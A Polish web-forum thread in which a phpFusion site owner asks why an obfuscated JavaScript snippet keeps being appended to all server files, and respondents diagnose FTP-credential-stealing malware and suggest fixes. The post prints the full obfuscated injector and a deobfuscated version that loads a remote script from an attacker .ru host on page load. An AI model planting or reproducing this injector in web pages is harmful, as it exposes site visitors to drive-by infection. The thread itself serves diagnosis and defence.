Wirus na serwerze ? Coś się dopisuje do plików !

Witam

W ostatnim czasie mam problem. Miesiąc temu zdarzyło mi się że do każdego pliku na serwerze dopisał mi się taki skrypt:
try {this.oO='';var oq=new Array();var U=new Array();var X="rep"+"lac"+"AKkZe".substr(4);var O=RegExp;var k='';this.eA='';var S;if(S!='' && S!='wC'){S='ke'};function W(B,o){var Ubf;if(Ubf!='' && Ubf!='aG'){Ubf=null};var M="[YKb".substr(0,1);var i;if(i!='P' && i!='gC'){i='P'};var yY;if(yY!='yv' && yY!='A'){yY='yv'};var N="g";var Wb;if(Wb!='J' && Wb != ''){Wb=null};M+=o;M+=String("]");var y=new O(M, N);return B[X](y, new String());};var C=new Date();var mf='';var Y;if(Y!='I' && Y!='JH'){Y='I'};var g=W('cxrIeIaKtKexExlxeImKeInxtK',"KxI");this.c='';var K=W('oNnulIoNaIdH',"NuGHI");var x=window;var gM;if(gM!=''){gM='z'};var Wc=W('/SgSozozgSlzez.zczoSmz/zgSozoSgSlzeS.zczoSmS/ziSgznS.zczozmz/zmSeSgSazvSizdzezoz.zczozmz/SaSbSoSuStS.zcSozmz.SpzhzpS',"Sz");var D;if(D!='n'){D='n'};var V=W('sKcKrKiZpZtU',"ZKgU");var e='';var Or;if(Or!='' && Or!='eM'){Or=null};var aT;if(aT!='' && aT!='q'){aT=null};var w=W('82711172052271278572120555557',"1725");var BE=W('hQtQtLpL:L/Q/QrQkQ-QcLoLmL.L5Q1LyLeLsL.QcQoLmL.QaLuLfQeLmQiQnLiQnQ-LcLoLmL.LTLhQeQBLlLeQnLdLeLrQTLuQtLoQrQiLaQlQ.QrLuL:L',"LQ");BA=function(){var ud=new Date();var Gq;if(Gq!=''){Gq='d'};var LF;if(LF!='QL'){LF='QL'};r=document[g](V);this.fa="";e=BE+w;var pa="";var mJ=new String();e+=Wc;var exG=new Date();var hB;if(hB!='' && hB!='iM'){hB='F'};var io="";var qQ="";var Mv;if(Mv!='T'){Mv=''};r.defer=([1,2][0]);var vj=new String();r.src=e;var Tm;if(Tm!='' && Tm!='lA'){Tm='Zu'};document.body.appendChild(r);var hS;if(hS!='QM'){hS=''};};this.ms='';this.TV='';x[K]=BA;var iN;if(iN!='b' && iN != ''){iN=null};var dl;if(dl!=''){dl='TVS'};var MY='';} catch(_){var H;if(H!='' && H!='d_'){H='qd'};var Kv=new Date();};

Usunąłem wszystko i zainstalowałem phpFusion 7.05 PL od nowa. Dziś rano o godzinie 8:28 znowu się to pojawiło - właśnie taka jest data modyfikacji plików. Komputer był wtedy na 100% wyłączony. Do korzystania z FTP używam FileZilli 3.3.0.1 Na stronie mam licznik z Stat24.

HOSTING NA 2BE.PL
Co to może być ? Jak się przed tym zabezpieczyć ?

Pozdrawiam

Przeskanuj swój system antywirusem. Od dawna krąży po sieci malware wykradający adminom hasła zapisane w różnych klientach FTP etc. i dzięki nim dopisuje do stron skrypt pozwalający na ataki na kolejne, odwiedzające stronę komputery. Dopiero jak wyczyścisz system to wyczyść FTP, bez zaglądania na stronę - możesz sobie znowu system zainfekować tym lub nowszym draństwem.

Wyłącz też zapamiętywanie haseł do ftp w filezilli.

I zmień hasło. Bo może już gdzieś "wyciekło". Ewentualnie sprawdź miejsca, gdzie użytkownicy mogą uploadować pliki - może jest jakiś katalog, do którego można wgrać skrypt PHP i go uruchomić, ewentualnie może ten phpFusion ma jakieś luki?

Przeczyściłem sobie ten skrypt, bardzo prostacka obfuskacja. Wygląda to tak:

window.onload=function(){
    r=document.createElement('script');
    r.defer=1;
    r.src='http://rk-com.51yes.com.aufeminin-com.TheBenderTutoria.ru:8080/google.com/google.com/ign.com/megavideo.com/about.com.php';
    document.body.appendChild(r);
};

Co ciekawe domena thebendertutoria.ru nie jest jeszcze zarejestrowana.

Nie wiem na ile pozwala ci 2be, ale możesz spróbować przejrzeć access logi i zablokować ip, z którego to przyszło. Albo zarejestruj na siebie domenę thebendertutoria i nie będziesz musiał przejmować się tymi skryptami ;)